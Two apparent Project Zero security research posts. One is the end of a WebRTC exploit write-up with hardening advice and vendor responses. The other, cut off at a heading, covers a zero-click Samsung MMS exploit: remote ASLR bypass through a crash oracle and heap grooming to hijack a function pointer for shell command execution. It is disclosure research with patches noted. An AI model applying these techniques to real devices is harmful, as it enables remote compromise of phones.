Integrators also have a responsibility to keep WebRTC up to date with security fixes, and many of them have failed in this area. It was surprising to see so many versions of WebRTC that are well over a year old. Developers should monitor every library they integrate for security updates, and apply them promptly.

Application Design


Application design affects the risk posed by WebRTC, and many applications researched were designed well. The easiest, and most important way to limit the security impact of WebRTC is to avoid starting the WebRTC connection until the callee has accepted the call by interacting with the device. This turns an exploit that can compromise any user quickly into an exploit that requires user interaction, and won’t be successful on every target. It also makes lower quality vulnerabilities not practically exploitable, because while a fully remote exploit can be attempted many times without the user noticing, an exploit that requires a user to answer a call needs to work in a small number of tries.

Starting the WebRTC connection late has a performance impact, and precludes certain features, like giving the callee a preview of the call. Of the applications that the exploit worked on, two started the connection without user interaction, and two required user interaction. JioChat and the application we are not yet identifying tried to use unique tricks to delay the connection until the user accepted the call without performance impact, but introduced vulnerabilities as a result. Developers should be aware that the best way to delay a WebRTC connection is to avoid calling setRemoteDescription until the user has accepted the call.  Other methods might not actually delay the connection and can cause other security problems.

Another way to reduce the security risk of WebRTC is to limit who an attacker can call, for example by requiring that the callee have the user in their contact list, or only allowing calls between users that have agreed to be able to message each other in the application. Like delaying the connection, this greatly reduces the targets an attacker can reach without a lot of effort.

Finally, integrators should limit the features of WebRTC an attacker can use to the features the application needs. Many applications were not vulnerable to this specific exploit because they had effectively disabled SCTP. Others did not use SCTP, but did not disable it in a way that prevented attackers from using it, and I was able to enable it. The best way to disable a feature in WebRTC is to remove it at compile time, which is supported for certain codecs. It is also possible to disable certain features through the PeerConnection and PeerConnectionFactory, and this is also very effective. Features can also be disabled by filtering SDP, but it is important to make sure that the filter is robust and tested thoroughly.

Conclusion

I wrote an exploit for WebRTC for Android involving two vulnerabilities in usrsctp. This exploit was fully remote on Signal, Google Duo, JioChat and one other application, and required user interaction on VK, OK and TamTam. Seven other messengers were not affected because they effectively disabled SCTP. Several applications used versions of WebRTC that did not include patches for either of the vulnerabilities used in the exploit. One remains unpatched. Low patch uptake is partially a result of WebRTC historically providing poor patching guidance. Integrators can reduce the risk of WebRTC by requiring user interaction to start a WebRTC connection, limiting who users can call easily and disabling unused features. They should also consider whether video conferencing is an important and necessary feature of their application.

Vendor Response

The software vendors mentioned in this blog post were given a chance to review this post before it was posted publicly, and some provided responses, as follows.

WebRTC

The WebRTC bug that was used both to bypass ASLR and move the instruction pointer has been fixed. WebRTC no longer passes the SctpTransport pointer directly into usrsctp, using an opaque identifier that is mapped to a SctpTransport instead, with invalid values being ignored. We have identified and patched every affected Google product and reached out to 50 applications and integrators using WebRTC, including all applications analyzed in this post. For all applications and integrators who have not yet patched the vulnerability, we recommend updating to the WebRTC M85 branch, or patching the following two commits: 1, 2.

Mail.ru

User security is of the highest priority for all Mail.ru Group products, which include VK, OK, TamTam and others. Acting on the information we received regarding the vulnerability, we immediately started the process of updating our mobile apps to the latest version of WebRTC. This update is currently underway. We have also implemented algorithms on our servers that no longer allow this vulnerability to be exploited in our products. This action allowed us to fix the issue for all of our users within 3 hours of receiving the information with an exploit demonstration.

Signal

We appreciate the effort that went into finding these bugs and improving the security of the WebRTC ecosystem. Signal had already shipped a defensive patch that protected users from this exploit prior to its discovery. In addition to routine updates of our calling libraries, we continue to take proactive steps to mitigate the impact of future WebRTC bugs.

Slack

We're pleased to see that this report concludes that Slack is not impacted by the referenced WebRTC vulnerabilities and exploits. Upon learning about this risk, we undertook additional diligence and confirmed that the entirety of our Calls service is not impacted by the vulnerabilities and findings described here.

MMS Exploit Part 5: Defeating Android ASLR, Getting RCE

12 August 2020 at 17:28
By: Ben
Posted by Mateusz Jurczyk, Project Zero

This post is the fifth and final of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. Previous posts are linked below:


Furthermore, with this last post, I have uploaded the source code of the MMS exploit to GitHub and the bug tracker. I hope it will serve as a useful reference while reading this blog, and help bootstrap further research in the area of MMS security.

Introduction

Up until this point in the story, I have managed to construct a reliable ASLR oracle delivered via MMS. It works by taking advantage of a buffer overflow to corrupt an android::Bitmap object on the heap and trigger a read from a controlled address, and abuses MMS delivery reports to transmit the oracle output (crash or lack thereof) back to the attacker. In fact, the oracle conveniently makes it possible to test the readability of an arbitrary memory range, not just a single address. On the other hand, due to the crash handling logic on Android, the queries must be sent at least one minute apart from each other, which severely limits the data throughput of the already restricted communication channel.

The current goal is to take the 1-bit information disclosure, and use it to build a high level algorithm capable of remotely leaking full 64-bit addresses in an acceptable number of steps. The acceptability criteria is hard to clearly define, since in real life, it would mostly depend on the tolerable exploit run time specified by the malicious actor. The general rule of thumb is "the fewer, the better", but for the purpose of the exercise, I aimed to design an exploit running in a maximum of 8 × 60 = 480 oracle queries (and what follows, ~480 minutes). This corresponds to the average user's night sleep, and seemed like a plausible attack scenario for a zero-click MMS exploit.

There are two major aspects of defeating ASLR: what do we leak and how do we leak it. As disconnected as they might seem, the two elements are actually closely related. It might not matter which parts of the process address space we intend to use, if they don't overlap with what we can realistically find in memory. With that in mind, I decided to start by familiarizing myself with the typical address space of the com.samsung.android.messaging process, and the overall state of ASLR on Android 10. This would hopefully give me an understanding of some of its weaknesses (if any), and ideally some ideas for bypassing the mitigation. From the outset, the only thing I knew for a fact was the Zygote design, which guaranteed persistent addresses across different instances of a crashing app, and was a crucial part of the attack. I learned the rest mostly by experimenting with a rooted Galaxy Note 10+ phone, as outlined in the sections below.

Android memory layout

Throughout this blog post, we'll be analyzing the Messages memory map found in the /proc/pid/maps pseudo-file. When we look at a few different maps (obtained by rebooting the phone several times to re-randomize the memory layout), we can immediately notice that a majority of mappings, including all shared objects, reside somewhere between 0x6f00000000 and 0x8000000000, with a few exceptions:

  • Mappings of .art, .oat and .vdex files under /system/framework, and some Dalvik-related regions in the low 4 GB of the address space.
  • An isolated mapping of the /system/bin/app_process64 ELF somewhere between 0x5500000000 and 0x6500000000.

Neither of these cases seem particularly interesting right now, although we might want to go back to the low 32-bit mappings if we don't have any success with the higher regions. In general, the usual suspects for leaking (heap areas, libc.so, libhwui.so, …) are all located between 0x6f00000000 - 0x8000000000, which sums up to 68 GB of the effective randomization range. In other words, that's over 24 bits of entropy, a number that is certainly not very encouraging on its own. However, let's not despair just yet and instead let's look closer at how the mappings are laid out in the address space.

We could continue manually inspecting the maps files to look for more insights, but I found that staring at thousands of hexadecimal addresses was not an effective way to reason about the memory layout. As a fan of memory visualization, I wrote a quick Python script to convert a textual maps file to a 2048x8704 bitmap, where each pixel represented one 4 kB page and the color denoted its state and access rights:

  • black for unmapped pages
  • gray for mapped no-access pages
  • green for read-only pages
  • blue for read/write pages
  • red for execute-only pages

Converting three random memory layouts of the Messages process yielded the following results:

Example Android 10 memory layouts

ASLR definitely works, as all memory is mapped at different addresses across reboots. On the other hand, the entropy of the mappings relative to each other is rather low, as they seem to be packed very close together in the scope of each memory map. Furthermore, they add up to a relatively large memory area compared to the 68 GB randomization space. There is one huge continuous read-only (green) memory mapping that particularly stands out:

745c6ea000-745c6ed000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c6ed000-745c6ee000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c6ee000-745c9b3000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c9b3000-745c9b4000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c9b4000-745ca89000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca89000-745ca8a000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8a000-745ca8b000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8b000-745ca8c000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8c000-745ca8d000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8d000-745ca90000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca90000-745ca91000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca91000-745ca92000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca92000-74dc6ea000 r--p 00000000 00:00 0          [anon:cfi shadow]

This is an auxiliary memory region for Control Flow Integrity (CFI), a security mitigation enabled in Android user-mode code since version 8 and in kernel-mode since Android 9 (source). As explained in the documentation, the shadow area stores information that helps locate the special __cfi_check function for each code page of a CFI-enabled library or executable. There are 2 bytes of metadata reserved for each page in the address space, and the overall CFI shadow spans 2 GB of memory (for instance in the layout above, 0x74dc6ea000 - 0x745c6ea000 = 0x80000000). This means that there is always a continuous 2 GB chunk of memory somewhere in the total 68 GB search space, and other interesting mappings are located in its direct vicinity.

Because the shadow area is readable, it is detectable with our existing ASLR oracle. We can find it by running a linear search of the address space in 2 GB intervals, and once a readable page is detected, by checking if 1 GB directly before or after it is readable too. Such a logic will deterministically find a valid address inside the CFI shadow in between 2 and 36 oracle queries (plus potentially one or two for some failed 1 GB checks). From an attacker's perspective, this is fantastic news, as it makes it possible to identify an approximate location of data and code in a very reasonable run time.

Knowing some readable address is already big progress, but it isn't readily usable yet. However, thanks to the fact that our oracle can probe entire memory ranges, we can use a simple binary search algorithm to determine the beginning or end of any readable area in around log2n steps, where n is the maximum expected size of the region. For a 2 GB region, that's a fixed number of 19 iterations, so the total number of queries needed to find the bounds of the CFI shadow is between 21 and 55.

Ironically, CFI is not even enabled for the libhwui.so library that we're exploiting, so while it is technically a mitigation, it worked solely in the attacker's favor in this case. This is not to say that CFI or other defense-in-depth mechanisms are bad to begin with, but rather that they should be carefully designed and scrutinized for regressions that might bring their overall security impact down to a net negative. This specific CFI weakness was fixed by defaulting to PROT_NONE as the access rights of the unused parts of the shadow (more than 99% of its space), and it will ship in a future version of Android. For a somewhat related read on the subject of mitigation (in)security, please see Jann Horn's "Mitigations are attack surface, too" post on the Project Zero blog.

Finding initial cheap exploit gadgets – linker64

Now that we can establish the start and end of the 2 GB CFI region, we should use the information to disclose the base addresses of some nearby libraries. When I inspected the memory maps on my test phone, I noticed that a fixed set of 168 modules was persistently mapped at addresses higher than the shadow, and 54 modules below it. All libraries that I was potentially interested in leaking (e.g. libhwui.so, libc.so) were placed within 128 MB from the end of the CFI shadow, so I decided to focus on that area. Let's zoom in on the three unique memory layouts visualized earlier in this post:

Visualization of the 128 MB of memory after CFI shadow

There aren't too many similarities between these three layouts, and in hindsight, this is expected as the library load order has been randomized in the Android linker since 2015. As a result, there aren't any constant library offsets relative to the CFI shadow that we could readily use. Nonetheless, one region has an exceptionally low variance between all three memory layouts – the bottom green stripe separated from the rest of the libraries with a large non-readable gap (marked in gray):

A memory region with particularly low randomization entropy

What is it?

733e63b000-733e643000 rw-p 00000000 00:00 0       [anon:thread signal stack]
733e643000-733e644000 rw-p 00000000 00:00 0       [anon:arc4random data]
733e644000-733e645000 rw-p 00000000 00:00 0       [anon:Allocate]
733e645000-733e646000 r--p 00000000 00:00 0       [anon:atexit handlers]
733e646000-733e647000 rw-p 00000000 00:00 0       [anon:arc4random data]
733e647000-733e648000 r--p 00000000 00:00 0       [vvar]
733e648000-733e649000 r-xp 00000000 00:00 0       [vdso]
733e649000-733e681000 r--p 00000000 103:09 216    /system/bin/linker64
733e681000-733e752000 r-xp 00038000 103:09 216    /system/bin/linker64
733e752000-733e753000 rw-p 00109000 103:09 216    /system/bin/linker64
733e753000-733e75a000 r--p 0010a000 103:09 216    /system/bin/linker64
733e75a000-733e761000 rw-p 00000000 00:00 0 
733e761000-733e762000 r--p 00000000 00:00 0 
733e762000-733e764000 rw-p 00000000 00:00 0 

As it turns out, it is not one mapping but several adjacent Linux internal regions, with a bulk of the address range taken up by the /apex/com.android.runtime/bin/linker64 module (linked to by /system/bin/linker64). It is the interpreter used by other dynamically linked executables, equivalent to /lib64/ld-linux-x86-64.so.2 on Linux x64:

d2s:/system/bin $ file app_process64
app_process64: ELF shared object, 64-bit LSB arm64, dynamic (/system/bin/linker64)
d2s:/system/bin $

The fact that linker64 is the first ELF loaded in memory by the kernel explains its low address entropy relative to the CFI shadow – it is not subject to the same load order randomization as other libraries. The question is, is it useful for exploitation?

In the firmware of my test Note 10+ device (February 2020 patch level), the linker64 file is 1.52 MB in size. If we open it in IDA Pro (or your favorite disassembler) and browse the functions list, we can immediately spot a number of routines that could be chained together or used on their own to achieve arbitrary code execution. For example, there is a generic _dl_syscall function for invoking system calls, wrappers for specific syscalls operating on files and memory (e.g. _dl_open64, _dl_read, _dl_write, _dl_mmap64, _dl_mprotect), and even functions for starting new processes such as _dl_execl, _dl_execle, _dl_execve, and _dl_execvpe. However, the absolute number one is the __dl_popen function with the following definition:

FILE* popen(const char* cmd, const char* mode);

For all intents and purposes of the attacker, the routine is equivalent to libc's system() in that it executes arbitrary shell commands. The only notable difference is that it also accepts a second argument that has to be a valid, readable pointer. Otherwise, they're essentially the same, which means that we likely won't have to locate libc.so or similar libraries in memory, as linker64 already provides plenty of practical exploitation gadgets. If you're curious how __dl_popen even made its way into linker64, it's through convertMonotonic defined in system/core/liblog/logprint.cpp (called by _dl_android_log_formatLogLine), which uses the function to parse dmesg output:

Decompiled code of the convertMonotonic function

Now that we know we are interested in leaking linker64, we should figure out how many oracle queries it will take. To find a precise answer, I used my test device to generate a corpus of 4000 unique memory maps, which should be a statistically significant sample size for running various kinds of analyses. Within that corpus, the offset of the linker64 base relative to the end of the CFI shadow ranged between 107.94 MB and 108.80 MB, so less than 1 MB of variance. If we also account for any readable regions directly adjacent to the CFI shadow, which cannot be distinguished from the shadow memory by our oracle, the distance to linker64 ranged from 104.05 MB to 108.40 MB. Just to add a bit of versatility in my exploit, I implemented the search starting from a round 100 MB offset from the CFI end.

The logic of identifying linker64 in memory is as follows: we probe a single page in 1088 kB intervals (the span of linker64 in the address space), and when we encounter a readable one, we check if there is a 544 kB accessible region to the right or left of the page – if that's the case, we found some address inside the ELF. We then use the binary search algorithm again, which takes exactly 9 iterations to determine the end of the readable area. After subtracting the size of the module and the few pages of adjacent memory (0x11B000 in total) from the resulting address, we get the base address of linker64.

With this logic, my testing indicates that the leaking of CFI shadow + linker64 takes between 38 and 75 oracle queries, with an average of 56.45 queries on the memory maps corpus mentioned before. This translates to around 40-80 minutes of exploit run time, which is a very satisfactory efficacy so far.

Locating libhwui.so in memory

At this point in the research, I spent some time trying to complete the attack based solely on the linker64 base address. The key piece of the puzzle was a suitable gadget function which had to meet the following conditions:

  • Had its address stored somewhere in the static memory of the module, such that we could point the fake vtable of the android::Bitmap object there and trigger a call to the function.
  • Called a function pointer loaded from the first argument, preferably with parameters that were either controlled or pointed to controlled data.

Unfortunately I didn't manage to find any applicable gadgets during my brief manual analysis, but I don't rule out the possibility that they exist and perhaps could be recognized with a more automated approach. This is left as an open challenge to the reader, and I'll be very interested to learn how RCE can be achieved with the help of linker64 alone.

As we can remember from Part 3, it is possible to call a controlled function pointer with two arbitrary arguments by corrupting the android::Bitmap.mPixelStorage.external structure fields. The only requirement is that we must know the base address of libhwui.so, to restore the Bitmap vtable pointer to its original value in the linear buffer overflow. And so, I started contemplating how the specific library could be efficiently recognized among all the other 168 shared objects loaded in random order within ~100 MB of the CFI shadow. I turned my eyes to the memory visualization bitmaps again.

For simplicity, let's eliminate blue from the color palette of the memory map (previously used for rw- mappings), and use green for all kinds of readable pages (incl. r--, rw- and r-x). This is closer to how the ASLR oracle "sees" memory, and it should make it easier to understand the layout of memory we're operating on:

The oracle's view of the 128 MB address range after CFI shadow

The numerous red regions in the bitmap are not inaccessible PROT_NONE mappings, but rather they are sections of code with the "r" bit off:

74dd777000-74dd9a3000 r--p 00000000 103:09 4238    /system/lib64/libhwui.so
74dd9a3000-74ddf3c000 --xp 0022c000 103:09 4238    /system/lib64/libhwui.so
74ddf3c000-74ddf41000 rw-p 007c5000 103:09 4238    /system/lib64/libhwui.so
74ddf41000-74ddf69000 r--p 007ca000 103:09 4238    /system/lib64/libhwui.so
[...]
74de900000-74de92a000 r--p 00000000 103:09 4575    /system/lib64/libvintf.so
74de92a000-74de978000 --xp 0002a000 103:09 4575    /system/lib64/libvintf.so
74de978000-74de979000 rw-p 00078000 103:09 4575    /system/lib64/libvintf.so
74de979000-74de97e000 r--p 00079000 103:09 4575    /system/lib64/libvintf.so

The nonstandard memory rights are caused by a new Execute Only Memory (XOM) mitigation introduced in Android 10. Unfortunately, similarly to the CFI shadow, the mitigation doesn't interfere with our exploit in any way and instead makes the exploitation considerably easier. That's because every library in memory is now fragmented into three parts:

  • A readable area used by .rodata, .eh_frame and similar segments.
  • A non-readable area for the .text and .plt segments.
  • A readable area for sections such as .data and .bss.

The middle non-readable part creates an observable gap of a fixed size, which can be successfully used to fingerprint libraries in memory. To make things even worse, this is especially easy for libhwui.so, because it is by far the largest shared object loaded in the address space, spanning 7.94 MB split into: 2.17 MB (readable), 5.59 MB (execute-only), 180 kB (readable). In the memory map above, it is easy to spot as the single biggest continuous chunk of red color:

Representation of libhwui.so in the memory visualization above

Thanks to XOM, the question is not if we can find libhwui.so, but how efficiently we can find it. Let's consider our options.

Memory scanning algorithm #1 – basic search over mapped regions

To reiterate our working assumptions, the goal is to quickly and accurately identify the 7.94 MB libhwui.so mapping within ~100 MB of the end of CFI shadow. The first algorithm that I tested was very simple:

  • Check the readability of one page in 2.17 MB intervals, such that we always test a page inside the first readable libhwui.so region of that size.
  • If the page is readable, find the end of the accessible region with binary search: let's call it X.
  • Test if the surrounding memory looks like our library:
    • oracle(X - 2.17 MB, 2.17 MB) == True
    • oracle(X + 5.59 MB - 4 kB, 4 kB) == False
    • oracle(X + 5.59 MB, 180 kB) == True
  • If all conditions are met, we have a candidate for libhwui.so.

For fully reliable output, the algorithm collects all candidates over the 100 MB area, and if there is more than one at the end of the scan, it makes additional queries to check non-readability at random offsets of the suspected .text sections, until a single candidate remains. However, since the heuristics used to find the candidates are already quite strong, we might cut some corners and just return the first candidate we encounter hoping it's likely the correct address. This is what I call "light mode", and in my research, I've tested both modes of operation of each algorithm to compare their accuracy and performance against the my memory map corpus.

Let's look at the numbers of our initial algorithm:

Algorithm #1
Light mode
Full mode
Min. oracle queries
14
256
Max. oracle queries
370
427
Avg. oracle queries
162.90
370.15
Accuracy
99.1% (3964/4000)
100% (4000/4000)

For a first idea, that's not a terrible outcome – especially in light mode, the number of queries and the accuracy are somewhat acceptable. The 0.9% error rate is caused by the fact that we don't verify the non-readability of the whole 5.59 MB .text section, and we only know that it's non-readable at the beginning and end. This may lead to false positives if other libraries are laid out in memory so unfavorably that they produce a mapping boundary at the offset we are testing for. The full mode mitigates the problem, but at the cost of more than doubling the average number of needed queries, which doesn't seem worth the extra 0.9% accuracy. It is probably more effective to just add a few more random checks of the .text segment to light mode, which would still retain its heuristic nature, but could reduce the error rate to a negligible percentage.

Now that we have a general idea of how the libhwui.so detection algorithm may look like, let's see if we can make any substantial improvements.

Memory scanning algorithm #2 – forward page sampling

In the previous algorithm, we spent 9 iterations in each binary search to find the end of a region, and we invoked it for each of up to 100 ÷ 2.17 ~= 46 readable pages we could have encountered during the scan. This is very wasteful, because most locations in memory look nothing like libhwui.so, and we can quickly disqualify them as candidates without involving the costly operation. The key is to better utilize the fact that we are looking for a huge 5.59 MB continuous non-readable region, whereas most of the search space is actually readable.

Specifically, we will continue sampling pages in 2.17 MB intervals, but instead of treating every readable page as a valid lead to follow up on, we will only act on a series of [1, 0, 0] oracle results. This is how libhwui.so will manifest itself in the sampling output, since the 2.17 MB readable prologue will generate exactly one "1", and the 5.59 MB gap will produce at least two 0's. The three final conditions verified for each candidate in algorithm #1 remain the same here. Of course, the light mode of this improved method is still prone to false positives, but the error rate should be lower because we're verifying two additional offsets in the non-readable range. Furthermore, the algorithm should be more effective, since we're performing the same amount of sampling but much fewer binary searches. Let's see if this is reflected in the numbers of my memory maps data set:

Algorithm #2
Light mode
Full mode
Min. oracle queries
16
71
Max. oracle queries
120
143
Avg. oracle queries
44.90
92.25
Accuracy
99.925% (3997/4000)
100% (4000/4000)

Indeed, both the accuracy of the light mode and the oracle query counts have greatly improved. We can now locate libhwui.so with almost full confidence in an average of ~45 iterations, which is a very satisfying result. Combined with the avg. 56.45 queries needed to leak the end of CFI shadow and linker64 base address, it adds up to ~100 queries statistically needed to execute the attack, which is well within the bounds of my initial objective (<480 queries total).

The algorithm in this shape was used in the recording of the Galaxy Note 10+ exploit demo video in April 2020, with a minor difference of using 2 MB sampling intervals instead of 2.17 MB. Since then, I have come up with some further optimizations that I will discuss in the section below.

Memory scanning algorithm #3 – the Boyer-Moore optimization

If we think about it, our algorithm currently spends most of the time performing a kind of string searching of the [1, 0, 0] pattern over a sampled view of the address space. In the process, we linearly obtain the values of all consecutive samples until a match is found. But perhaps we could borrow some ideas from classic string searching algorithms to reduce the number of comparisons, and thus the number of pages needed to be sampled, too?

One idea that I had was to run the matching starting from the "tail" (last value) of the pattern and iterating backwards, instead of starting from the head. This is a concept found in the Boyer-Moore algorithm, and it improves the computational complexity by making it possible to "skip along the text in jumps of multiple characters rather than searching every single character in the text.". This is especially true for a pattern of the form N × [1] + M × [0], such as [1, 0, 0]. For instance, if there is a mismatch on the last value of the pattern, we know for sure that there won't be a match at offset 0 (currently tested) or 1, and we can resume the search from offset 2, completely skipping an extra offset in the text.

Let's demonstrate this on an example:

Sampled memory map:


1
1
0
1

1

1

1
0
0
Pattern matching process:
1
0
0













1
0
0












1
0
0













1
0
0













1
0
0













1
0
0













1
0
0

As we can see, thanks to the multi-offset jumps enabled by early mismatches in the tail of the text, 5 out of 14 locations in the sampled memory map were never touched by the algorithm, and their values didn't have to be determined by the ASLR oracle. In this case, it is a 35% reduction of the number of necessary oracle queries, and the effect of the optimization can be further amplified by decreasing the sampling interval to some extent, thus making the searched pattern longer. The fact that most of the search space contains readable regions contributes to its success, as the tail comparisons tend to fail early, leading to large jumps skipping broad ranges of memory.

I implemented the optimization in my exploit and experimented with various configurations, to finally conclude that the most efficient setting was a 1 MB sampling interval and a [1, 1, 0, 0, 0, 0, 0] oracle pattern. It was measured to have the following performance:

Algorithm #3
Light mode
Full mode
Min. oracle queries
19
38
Max. oracle queries
64
88
Avg. oracle queries
29.63
58.90
Accuracy
100% (4000/4000)
100% (4000/4000)

In my opinion, that's a solid result. In comparison to algorithm #2, the maximum number of queries was reduced 120 → 64, the average queries decreased by 34% (44.90 → 29.63), and the light mode accuracy reached 100%, making it virtually indistinguishable from the full mode. I think it's a good time to wrap up the work on the libhwui.so leaking logic, but if you have any further ideas for improvement, I'm all ears!

Putting the ASLR bypass together

We can now combine the CFI shadow, libhwui.so and linker64 disclosure logic and run some final benchmarks on the code. In my testing, the final exploit takes between 45 and 129 oracle queries to calculate the two library base addresses, with an average of 85.91 requests. Assuming that the heap buffer overflow is very (99%+) reliable, and every query is only made once, this is equivalent to around 1 – 2.5 hours of run time. An animation illustrating the end-to-end process of a remote ASLR bypass is shown below:


It's worth noting that the animation depicts the exact same queries that were made in the original exploit demo recorded in April, so it's based on the slightly slower algorithm #2. The usage of the optimized algorithm #3 would further reduce the number of necessary queries for this memory layout from 86 down to 75.

Moving on to RCE

As discussed in Part 3, knowing the locations of libhwui.so and linker64 allows us to redirect the Bitmap vtable to any function pointer found in the static memory of these modules, or call any of their functions directly with two controlled arguments, by corrupting the android::Bitmap.mPixelStorage.external structure. The simplest way forward would be to call the __dl_popen routine with a shell command to execute, but that requires us to pass an address of our own ASCII string, which we currently don't know. I have briefly looked for ways to inject controlled data into the static memory of libhwui.so as a side effect of some multimedia decoding, but I failed to identify such a primitive.

Of course, the current capabilities at our disposal are so strong that completing the attack should be a formality. Since we can trigger x(y,z) calls where all of x, y, z are all controlled 64-bit values, we could find a write-what-where code gadget and use it twice in a row to set up a minimalistic 16-byte reverse shell command in some writable memory region. This could certainly work, but it would require the android::Bitmap overflow to succeed three times in a row (twice for the write-what-where and once for the RCE trigger) without any app restarts in between, which seemed to be a risk to the reliability of the exploit. I had hoped to achieve remote code execution in just a single MMS, but how do we do it without any clue as to the location of our data in memory?

One idea would be to have a pointer to our data passed as the first argument of the hijacked function call, without explicitly knowing or leaking the value of the address. Let's see if this could be applied to the mPixelStorage.external structure with a partial overflow, and how it overlaps with the legitimately used heap structure within in the encompassing mPixelStorage union:

    struct {
    struct {
  /* +0x80 */ void* address;
  /* +0x80 */ void* address;
  /* +0x88 */ size_t size;
  /* +0x88 */ void* context;

  /* +0x90 */ FreeFunc freeFunc;
    } heap;
    } external;

Conveniently, heap.address points to the bitmap pixel buffer and it overlaps with external.address, the first parameter passed to external.freeFunc. On the other hand, with the linear overflow we're using, it is impossible to modify external.freeFunc without first destroying the values of external.address and external.context. Does it mean that the whole idea is doomed to fail? Not at all, but it will require slightly more heap grooming than originally expected.

Calling functions with a string argument

Overall, I have discovered two different methods to pass string parameters to arbitrary functions – one during the initial exploit development in April 2020, and the second, admittedly a simpler one, while writing this blog post in July. :) I will briefly discuss both of them below. If you wish to follow along, you can use the reference android::Bitmap corruption Qmage sample shared on my GitHub.

Technique #1 – an uninitialized freeFunc pointer

We already know that we can't reach the external.freeFunc pointer without corrupting the other two fields in the structure. However, let's consider what happens if we still cause the heap → external type confusion by switching android::Bitmap.mPixelStorageType to External, but stop the overflow at that and don't corrupt anything beyond offset 0x70. As expected, external.address will assume the value of heap.address, external.context will be equivalent to heap.size, and external.freeFunc will remain uninitialized, because there is no corresponding field at that offset in the heap structure. Later on, when execution reaches the Bitmap::~Bitmap destructor, it will attempt to call the uninitialized function pointer. At that point, the first argument points to a buffer with our data (great!), but we don't really control the instruction pointer… or do we?

In order to set the uninitialized android::Bitmap.external.freeFunc field to some specific value, we would have to trigger an allocation in the same bucket as the Bitmap (129-160 bytes), fill it with our data, have it freed, have one other chunk in that bin size freed, and then have the Bitmap object allocated shortly after. This is caused by jemalloc's FIFO tcaches, which return the most recently freed region in the given bin size, and the fact that the Bitmap creation involves two 160-byte allocations: one for the (overflown) pixel buffer and the other for the C++ object itself. To reiterate, here's an example of a desired set of heap operations that would allow us to control external.freeFunc:

  1. malloc(160) → X
  2. malloc(160) → Y
  3. /* write controlled data to Y */
  4. free(Y);
  5. free(X);
  6. malloc(160) → X (Bitmap pixel backing buffer)
  7. malloc(160) → Y (Bitmap C++ object)

The Bitmap object is generally allocated very early in the image decoding process, but there is a bit of Qmage-related code that executes right before it: the header parsing code reached through the SkQmgCodec::MakeFromStreamParseHeaderQuramQmageDecParseHeader chain of calls. We can use the SkCodecFuzzer harness with the -l option to obtain a list of heap-related function calls made during header parsing, on the example of the Qmage test file:

malloc(      1216) = {0x408c0f8b40 .. 0x408c0f9000}
malloc(        48) = {0x408c0fafd0 .. 0x408c0fb000}
malloc(      1176) = {0x408c0fcb68 .. 0x408c0fd000}
malloc(      1176) = {0x408c106b68 .. 0x408c107000}
malloc(        17) = {0x408c108fef .. 0x408c109000} ───┐ (X)
malloc(      1024) = {0x408c10ac00 .. 0x408c10b000} ──┐│ (Y)
malloc(      7160) = {0x408c10c408 .. 0x408c10e000} ─┐││ (Z)
free(0x408c10c408) <─────────────────────────────────┘││
free(0x408c10ac00) <──────────────────────────────────┘│
free(0x408c108fef) <───────────────────────────────────┘
malloc(       792) = {0x408c139ce8 .. 0x408c13a000}
malloc(        48) = {0x408c13bfd0 .. 0x408c13c000}
[+] Detected image characteristics:
[+] Dimensions:      4 x 10
[+] Color type:      4
[...]

In the above listing, call stacks were edited out for brevity, and the trace was adjusted to match the allocations sequence observed on a real Android device. There are a few malloc calls, but most of them outlive the header parsing process, except for the three allocations of size 17, 1024 and 7160, highlighted in orange. They are all made during the decompression of the optional color table, and have the following functions:

  • Region X (17 bytes) is used to store the raw, zlib-compressed color table read directly from the input Qmage stream.
  • Region Y (1024 bytes) is used to store the inflated color table, which further undergoes some Qmage-specific processing.
  • Region Z (7160) is a fixed size inflate_state structure allocated inside inflateInit2_.

Considering that both the length and contents of regions X and Y are user-controlled, they match our requirements just perfectly. If we make them both between 129-160 bytes long, and set up the deflated data to have a specific 64-bit value at offset 0x90, then the pixel buffer will reuse region X, the Bitmap object will reuse region Y, and the freeFunc pointer will inherit the specially crafted value from the color table. This can be confirmed with a simple heap-tracing Frida script attached to the com.samsung.android.messaging process:

[9698] malloc(160) => 0x75aad1e980 ────┐    (deflated color table)
[9698] calloc(1, 152) => 0x75aad1ea20 ─┼─┐  (inflated color table)
[9698] malloc(7160) => 0x75b5557000    │ │
[9698] free(0x75b5557000)             (X)│
[9698] free(0x75aad1ea20)              │ │
[9698] free(0x75aad1e980)              │(Y)
[9698] malloc(792) => 0x75b5683500     │ │
[9698] malloc(48) => 0x7649a96140      │ │
[9698] calloc(160, 1) => 0x75aad1e980 <┘ │  (pixel buffer)
[9698] malloc(160) => 0x75aad1ea20 <─────┘  (android::Bitmap object)

Indeed, both regions allocated in the color table handling were then reused for the Bitmap object. If we set the freeFunc pointer to all 0x41's, and configure the first few pixels of the bitmap to contain an ASCII string, we should be able to trigger the following crash via MMS:

Thread 46 "pool-8-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 22783.23006]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x000000754e54ba60  →  "Hello, world!"
$x1  : 0xa0
[...]
$pc  : 0x41414141414141
$cpsr: [NEGATIVE zero carry overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414141414141
───────────────────────────────────────────────────────
gef➤  bt
#0  0x0041414141414141 in ?? ()
#1  0x0000007644d6df00 in android::Bitmap::~Bitmap() ()
Backtrace stopped: Cannot access memory at address 0x75b61149c8
gef➤

Success! We have managed to hijack the control flow while having the first argument (X0 register) point to a text string of our choice, without having to leak its address. Before using this primitive to execute commands, let's quickly review an alternative method to achieve this outcome.

Technique #2 – libwebp to the rescue

